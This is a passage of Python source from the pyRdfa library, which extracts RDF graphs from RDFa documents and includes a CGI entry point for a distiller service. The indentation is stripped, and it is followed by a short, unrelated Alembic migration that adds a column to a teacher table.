if name.endswith(suffix) :
self.media_type = preferred_suffixes[suffix]
self.charset = 'utf-8'
break
self.options.set_host_language(self.media_type)
return open(name, 'rb')
else :
return name
except HTTPError :
raise sys.exc_info()[1]
except :
(type, value, traceback) = sys.exc_info()
raise FailedSource(value)
####################################################################################################################
# Externally used methods
#
def graph_from_DOM(self, dom, graph = None, pgraph = None) :
"""
Extract the RDF Graph from a DOM tree. This is where the real processing happens. All other methods get down to this
one, eventually (e.g., after opening a URI and parsing it into a DOM).
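		A minimal usage sketch (the file name is a placeholder; any DOM produced by C{xml.dom.minidom} or by the html5lib DOM tree builder can be used)::
		 import xml.dom.minidom
		 dom = xml.dom.minidom.parse("example.xhtml")
		 graph = pyRdfa().graph_from_DOM(dom)
		 print(graph.serialize(format="turtle"))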
@param dom: a DOM Node element, the top level entry node for the whole tree (i.e., the C{dom.documentElement} is used to initiate processing down the node hierarchy)
		@keyword graph: an RDF Graph (if None, then a new one is created)
@type graph: rdflib Graph instance.
@keyword pgraph: an RDF Graph to hold (possibly) the processor graph content. If None, and the error/warning triples are to be generated, they will be added to the returned graph. Otherwise they are stored in this graph.
@type pgraph: rdflib Graph instance
@return: an RDF Graph
@rtype: rdflib Graph instance
"""
def copyGraph(tog, fromg) :
for t in fromg :
tog.add(t)
for k,ns in fromg.namespaces() :
tog.bind(k,ns)
if graph == None :
# Create the RDF Graph, that will contain the return triples...
graph = Graph()
# this will collect the content, the 'default graph', as called in the RDFa spec
default_graph = Graph()
# get the DOM tree
topElement = dom.documentElement
# Create the initial state. This takes care of things
# like base, top level namespace settings, etc.
state = ExecutionContext(topElement, default_graph, base=self.required_base if self.required_base != None else "", options=self.options, rdfa_version=self.rdfa_version)
# Perform the built-in and external transformations on the HTML tree.
logger.info(self.options)
for trans in self.options.transformers + builtInTransformers :
trans(topElement, self.options, state)
# This may have changed if the state setting detected an explicit version information:
self.rdfa_version = state.rdfa_version
# The top level subject starts with the current document; this
# is used by the recursion
# this function is the real workhorse
parse_one_node(topElement, default_graph, None, state, [])
# Massage the output graph in term of rdfa:Pattern and rdfa:copy
handle_prototypes(default_graph)
# If the RDFS expansion has to be made, here is the place...
if self.options.vocab_expansion :
from .rdfs.process import process_rdfa_sem
process_rdfa_sem(default_graph, self.options)
# Experimental feature: nothing for now, this is kept as a placeholder
if self.options.experimental_features :
pass
# What should be returned depends on the way the options have been set up
if self.options.output_default_graph :
copyGraph(graph, default_graph)
if self.options.output_processor_graph :
if pgraph != None :
copyGraph(pgraph, self.options.processor_graph.graph)
else :
copyGraph(graph, self.options.processor_graph.graph)
elif self.options.output_processor_graph :
if pgraph != None :
copyGraph(pgraph, self.options.processor_graph.graph)
else :
copyGraph(graph, self.options.processor_graph.graph)
# this is necessary if several DOM trees are handled in a row...
self.options.reset_processor_graph()
return graph
def graph_from_source(self, name, graph = None, rdfOutput = False, pgraph = None) :
"""
Extract an RDF graph from an RDFa source. The source is parsed, the RDF extracted, and the RDFa Graph is
returned. This is a front-end to the L{pyRdfa.graph_from_DOM} method.
@param name: a URI, a file name, or a file-like object
@param graph: rdflib Graph instance. If None, a new one is created.
@param pgraph: rdflib Graph instance for the processor graph. If None, and the error/warning triples are to be generated, they will be added to the returned graph. Otherwise they are stored in this graph.
@param rdfOutput: whether runtime exceptions should be turned into RDF and returned as part of the processor graph
@return: an RDF Graph
@rtype: rdflib Graph instance
"""
def copyErrors(tog, options) :
if tog == None :
tog = Graph()
if options.output_processor_graph :
for t in options.processor_graph.graph :
tog.add(t)
if pgraph != None : pgraph.add(t)
for k,ns in options.processor_graph.graph.namespaces() :
tog.bind(k,ns)
if pgraph != None : pgraph.bind(k,ns)
options.reset_processor_graph()
return tog
# Separating this for a forward Python 3 compatibility
try :
# Python 2 branch
isstring = isinstance(name, basestring)
except :
# Python 3 branch
isstring = isinstance(name, str)
try :
# First, open the source... Possible HTTP errors are returned as error triples
input = None
try :
input = self._get_input(name)
except FailedSource :
f = sys.exc_info()[1]
self.http_status = 400
if not rdfOutput : raise f
err = self.options.add_error(f.msg, FileReferenceError, name)
self.options.processor_graph.add_http_context(err, 400)
return copyErrors(graph, self.options)
except HTTPError :
h = sys.exc_info()[1]
self.http_status = h.http_code
if not rdfOutput : raise h
err = self.options.add_error("HTTP Error: %s (%s)" % (h.http_code,h.msg), HTError, name)
self.options.processor_graph.add_http_context(err, h.http_code)
return copyErrors(graph, self.options)
except Exception :
e = sys.exc_info()[1]
self.http_status = 500
# Something nasty happened:-(
if not rdfOutput : raise e
err = self.options.add_error(str(e), context = name)
self.options.processor_graph.add_http_context(err, 500)
return copyErrors(graph, self.options)
dom = None
try :
msg = ""
parser = None
if self.options.host_language == HostLanguage.html5 :
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import html5lib
parser = html5lib.HTMLParser(tree=html5lib.treebuilders.getTreeBuilder("dom"))
if self.charset :
# This means the HTTP header has provided a charset, or the
# file is a local file when we suppose it to be a utf-8
dom = parser.parse(input, encoding=self.charset)
else :
						# No charset set. The html5lib parser tries to sniff into the
						# file to find a meta header for the charset; if that
# works, fine, otherwise it falls back on window-...
dom = parser.parse(input)
try :
if isstring :
input.close()
input = self._get_input(name)
else :
input.seek(0)
from .host import adjust_html_version
self.rdfa_version = adjust_html_version(input, self.rdfa_version)
except :
							# if anything goes wrong, it is not really important; the rdfa version stays what it was...
pass
else :
# in other cases an XML parser has to be used
from .host import adjust_xhtml_and_version
parse = xml.dom.minidom.parse
dom = parse(input)
(adjusted_host_language, version) = adjust_xhtml_and_version(dom, self.options.host_language, self.rdfa_version)
self.options.host_language = adjusted_host_language
self.rdfa_version = version
except ImportError :
msg = "HTML5 parser not available. Try installing html5lib <http://code.google.com/p/html5lib>"
raise ImportError(msg)
except Exception :
e = sys.exc_info()[1]
				# These are various parsing exceptions. Per spec, this is a case when
# error triples MUST be returned, ie, the usage of rdfOutput (which switches between an HTML formatted
# return page or a graph with error triples) does not apply
err = self.options.add_error(str(e), context = name)
self.http_status = 400
self.options.processor_graph.add_http_context(err, 400)
return copyErrors(graph, self.options)
# If we got here, we have a DOM tree to operate on...
return self.graph_from_DOM(dom, graph, pgraph)
except Exception :
# Something nasty happened during the generation of the graph...
(a,b,c) = sys.exc_info()
sys.excepthook(a,b,c)
if isinstance(b, ImportError) :
self.http_status = None
else :
self.http_status = 500
if not rdfOutput : raise b
err = self.options.add_error(str(b), context = name)
self.options.processor_graph.add_http_context(err, 500)
return copyErrors(graph, self.options)
def rdf_from_sources(self, names, outputFormat = "turtle", rdfOutput = False) :
"""
		Extract an RDF graph from a list of RDFa sources and serialize it as one graph. The sources are parsed, the RDF
extracted, and serialization is done in the specified format.
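		A minimal sketch of a typical call (the file names are placeholders)::
		 processor = pyRdfa()
		 print(processor.rdf_from_sources(["a.html", "b.html"], outputFormat="turtle"))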
@param names: list of sources, each can be a URI, a file name, or a file-like object
		@keyword outputFormat: serialization format. Can be one of "turtle", "n3", "xml", "pretty-xml", "nt", "json" or "json-ld". "turtle" and "n3", "xml" and "pretty-xml", and "json" and "json-ld" are synonyms, respectively. Note that the JSON-LD serialization works with RDFLib 3.* only.
		@keyword rdfOutput: controls what happens in case an exception is raised. If the value is False, the caller is responsible for handling it; otherwise a graph is returned with an error message included in the processor graph
@type rdfOutput: boolean
@return: a serialized RDF Graph
@rtype: string
"""
# This is better because it gives access to the various, non-standard serializations
		# If it does not work because the extras are not installed, fall back to the standard
		# rdflib distribution...
try :
from pyRdfaExtras import MyGraph
graph = MyGraph()
except :
graph = Graph()
# graph.bind("xsd", Namespace('http://www.w3.org/2001/XMLSchema#'))
# the value of rdfOutput determines the reaction on exceptions...
for name in names :
self.graph_from_source(name, graph, rdfOutput)
retval = graph.serialize(format=outputFormat)
return retval
def rdf_from_source(self, name, outputFormat = "turtle", rdfOutput = False) :
"""
		Extract an RDF graph from an RDFa source and serialize it. The source is parsed, the RDF
extracted, and serialization is done in the specified format.
@param name: a URI, a file name, or a file-like object
		@keyword outputFormat: serialization format. Can be one of "turtle", "n3", "xml", "pretty-xml", "nt", "json" or "json-ld". "turtle" and "n3", "xml" and "pretty-xml", and "json" and "json-ld" are synonyms, respectively. Note that the JSON-LD serialization works with RDFLib 3.* only.
		@keyword rdfOutput: controls what happens in case an exception is raised. If the value is False, the caller is responsible for handling it; otherwise a graph is returned with an error message included in the processor graph
@type rdfOutput: boolean
@return: a serialized RDF Graph
@rtype: string
"""
return self.rdf_from_sources([name], outputFormat, rdfOutput)
################################################# CGI Entry point
def processURI(uri, outputFormat, form={}) :
"""The standard processing of an RDFa uri options in a form; used as an entry point from a CGI call.
The call accepts extra form options (i.e., HTTP GET options) as follows:
- C{graph=[output|processor|output,processor|processor,output]} specifying which graphs are returned. Default: C{output}
	- C{space_preserve=[true|false]} : whether white space in plain literals should be preserved (i.e., not normalized). Default: C{true}
	- C{rdfa_version} provides the RDFa version that should be used for distilling. The string should be of the form "1.0" or "1.1". Default is the highest version the current package implements, currently "1.1"
- C{host_language=[xhtml,html,xml]} : the host language. Used when files are uploaded or text is added verbatim, otherwise the HTTP return header should be used. Default C{xml}
- C{embedded_rdf=[true|false]} : whether embedded turtle or RDF/XML content should be added to the output graph. Default: C{false}
- C{vocab_expansion=[true|false]} : whether the vocabularies should be expanded through the restricted RDFS entailment. Default: C{false}
- C{vocab_cache=[true|false]} : whether vocab caching should be performed or whether it should be ignored and vocabulary files should be picked up every time. Default: C{false}
- C{vocab_cache_report=[true|false]} : whether vocab caching details should be reported. Default: C{false}
- C{vocab_cache_bypass=[true|false]} : whether vocab caches have to be regenerated every time. Default: C{false}
- C{rdfa_lite=[true|false]} : whether warnings should be generated for non RDFa Lite attribute usage. Default: C{false}
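	An illustrative request combining some of the options above (the script URL is a placeholder, and the C{uri} query parameter is assumed to be mapped by the wrapping CGI script onto this function's C{uri} argument)::
	 http://www.example.org/cgi-bin/rdfa-distiller?uri=http://www.example.org/doc.html&rdfagraph=output,processor&vocab_expansion=true&rdfa_lite=true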
	@param uri: URI to access. Note that the C{text:} and C{uploaded:} fake URI values are treated separately; the former is for textual input (in which case a StringIO is used to get the data) and the latter is for an uploaded file, where the form gives access to the file directly.
@param outputFormat: serialization format, as defined by the package. Currently "xml", "turtle", "nt", or "json". Default is "turtle", also used if any other string is given.
@param form: extra call options (from the CGI call) to set up the local options
@type form: cgi FieldStorage instance
@return: serialized graph
@rtype: string
"""
def _get_option(param, compare_value, default) :
param_old = param.replace('_','-')
if param in list(form.keys()) :
val = form.getfirst(param).lower()
return val == compare_value
elif param_old in list(form.keys()) :
# this is to ensure the old style parameters are still valid...
# in the old days I used '-' in the parameters, the standard favours '_'
val = form.getfirst(param_old).lower()
return val == compare_value
else :
return default
if uri == "uploaded:" :
input = form["uploaded"].file
base = ""
elif uri == "text:" :
input = StringIO(form.getfirst("text"))
base = ""
else :
input = uri
base = uri
if "rdfa_version" in list(form.keys()) :
rdfa_version = form.getfirst("rdfa_version")
else :
rdfa_version = None
# working through the possible options
# Host language: HTML, XHTML, or XML
# Note that these options should be used for the upload and inline version only in case of a form
# for real uris the returned content type should be used
if "host_language" in list(form.keys()) :
if form.getfirst("host_language").lower() == "xhtml" :
media_type = MediaTypes.xhtml
elif form.getfirst("host_language").lower() == "html" :
media_type = MediaTypes.html
elif form.getfirst("host_language").lower() == "svg" :
media_type = MediaTypes.svg
elif form.getfirst("host_language").lower() == "atom" :
media_type = MediaTypes.atom
else :
media_type = MediaTypes.xml
else :
media_type = ""
transformers = []
check_lite = "rdfa_lite" in list(form.keys()) and form.getfirst("rdfa_lite").lower() == "true"
# The code below is left for backward compatibility only. In fact, these options are not exposed any more,
# they are not really in use
if "extras" in list(form.keys()) and form.getfirst("extras").lower() == "true" :
from .transform.metaname import meta_transform
from .transform.OpenID import OpenID_transform
from .transform.DublinCore import DC_transform
for t in [OpenID_transform, DC_transform, meta_transform] :
transformers.append(t)
else :
if "extra-meta" in list(form.keys()) and form.getfirst("extra-meta").lower() == "true" :
from .transform.metaname import meta_transform
transformers.append(meta_transform)
if "extra-openid" in list(form.keys()) and form.getfirst("extra-openid").lower() == "true" :
from .transform.OpenID import OpenID_transform
transformers.append(OpenID_transform)
if "extra-dc" in list(form.keys()) and form.getfirst("extra-dc").lower() == "true" :
from .transform.DublinCore import DC_transform
transformers.append(DC_transform)
output_default_graph = True
output_processor_graph = False
# Note that I use the 'graph' and the 'rdfagraph' form keys here. Reason is that
# I used 'graph' in the previous versions, including the RDFa 1.0 processor,
# so if I removed that altogether that would create backward incompatibilities
# On the other hand, the RDFa 1.1 doc clearly refers to 'rdfagraph' as the standard
# key.
a = None
if "graph" in list(form.keys()) :
a = form.getfirst("graph").lower()
elif "rdfagraph" in list(form.keys()) :
a = form.getfirst("rdfagraph").lower()
if a != None :
if a == "processor" :
output_default_graph = False
output_processor_graph = True
elif a == "processor,output" or a == "output,processor" :
output_processor_graph = True
embedded_rdf = _get_option( "embedded_rdf", "true", False)
space_preserve = _get_option( "space_preserve", "true", True)
vocab_cache = _get_option( "vocab_cache", "true", True)
vocab_cache_report = _get_option( "vocab_cache_report", "true", False)
refresh_vocab_cache = _get_option( "vocab_cache_refresh", "true", False)
vocab_expansion = _get_option( "vocab_expansion", "true", False)
if vocab_cache_report : output_processor_graph = True
options = Options(output_default_graph = output_default_graph,
output_processor_graph = output_processor_graph,
space_preserve = space_preserve,
transformers = transformers,
vocab_cache = vocab_cache,
vocab_cache_report = vocab_cache_report,
refresh_vocab_cache = refresh_vocab_cache,
vocab_expansion = vocab_expansion,
embedded_rdf = embedded_rdf,
check_lite = check_lite
)
processor = pyRdfa(options = options, base = base, media_type = media_type, rdfa_version = rdfa_version)
# Decide the output format; the issue is what should happen in case of a top level error like an inaccessibility of
# the html source: should a graph be returned or an HTML page with an error message?
# decide whether HTML or RDF should be sent.
htmlOutput = False
#if 'HTTP_ACCEPT' in os.environ :
# acc = os.environ['HTTP_ACCEPT']
# possibilities = ['text/html',
# 'application/rdf+xml',
# 'text/turtle; charset=utf-8',
# 'application/json',
# 'application/ld+json',
# 'text/rdf+n3']
#
# # this nice module does content negotiation and returns the preferred format
# sg = acceptable_content_type(acc, possibilities)
# htmlOutput = (sg != None and sg[0] == content_type('text/html'))
# os.environ['rdfaerror'] = 'true'
# This is really for testing purposes only, it is an unpublished flag to force RDF output no
# matter what
try :
graph = processor.rdf_from_source(input, outputFormat, rdfOutput = ("forceRDFOutput" in list(form.keys())) or not htmlOutput)
if outputFormat == "n3" :
retval = 'Content-Type: text/rdf+n3; charset=utf-8\n'
elif outputFormat == "nt" or outputFormat == "turtle" :
retval = 'Content-Type: text/turtle; charset=utf-8\n'
elif outputFormat == "json-ld" or outputFormat == "json" :
retval = 'Content-Type: application/ld+json; charset=utf-8\n'
else :
retval = 'Content-Type: application/rdf+xml; charset=utf-8\n'
retval += '\n'
retval += graph
return retval
except HTTPError :
(type,h,traceback) = sys.exc_info()
import cgi
retval = 'Content-type: text/html; charset=utf-8\nStatus: %s \n\n' % h.http_code
retval += "<html>\n"
retval += "<head>\n"
retval += "<title>HTTP Error in distilling RDFa content</title>\n"
retval += "</head><body>\n"
retval += "<h1>HTTP Error in distilling RDFa content</h1>\n"
retval += "<p>HTTP Error: %s (%s)</p>\n" % (h.http_code,h.msg)
retval += "<p>On URI: <code>'%s'</code></p>\n" % cgi.escape(uri)
retval +="</body>\n"
retval +="</html>\n"
return retval
except :
# This branch should occur only if an exception is really raised, ie, if it is not turned
# into a graph value.
(type,value,traceback) = sys.exc_info()
import traceback, cgi
retval = 'Content-type: text/html; charset=utf-8\nStatus: %s\n\n' % processor.http_status
retval += "<html>\n"
retval += "<head>\n"
retval += "<title>Exception in RDFa processing</title>\n"
retval += "</head><body>\n"
retval += "<h1>Exception in distilling RDFa</h1>\n"
retval += "<pre>\n"
strio = StringIO()
traceback.print_exc(file=strio)
retval += strio.getvalue()
retval +="</pre>\n"
retval +="<pre>%s</pre>\n" % value
retval +="<h1>Distiller request details</h1>\n"
retval +="<dl>\n"
if uri == "text:" and "text" in form and form["text"].value != None and len(form["text"].value.strip()) != 0 :
retval +="<dt>Text input:</dt><dd>%s</dd>\n" % cgi.escape(form["text"].value).replace('\n','<br/>')
elif uri == "uploaded:" :
retval +="<dt>Uploaded file</dt>\n"
else :
retval +="<dt>URI received:</dt><dd><code>'%s'</code></dd>\n" % cgi.escape(uri)
if "host_language" in list(form.keys()) :
retval +="<dt>Media Type:</dt><dd>%s</dd>\n" % media_type
if "graph" in list(form.keys()) :
retval +="<dt>Requested graphs:</dt><dd>%s</dd>\n" % form.getfirst("graph").lower()
else :
retval +="<dt>Requested graphs:</dt><dd>default</dd>\n"
retval +="<dt>Output serialization format:</dt><dd> %s</dd>\n" % outputFormat
if "space_preserve" in form : retval +="<dt>Space preserve:</dt><dd> %s</dd>\n" % form["space_preserve"].value
retval +="</dl>\n"
retval +="</body>\n"
retval +="</html>\n"
return retval
the-stack_0_26019
"""empty message
Revision ID: 6597fae10131
Revises: 65048de1ebec
Create Date: 2018-09-16 00:46:14.107664
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '6597fae10131'
down_revision = '65048de1ebec'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('charge_teacher', sa.Column('tmp_classes_id', sa.String(length=80), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('charge_teacher', 'tmp_classes_id')
# ### end Alembic commands ###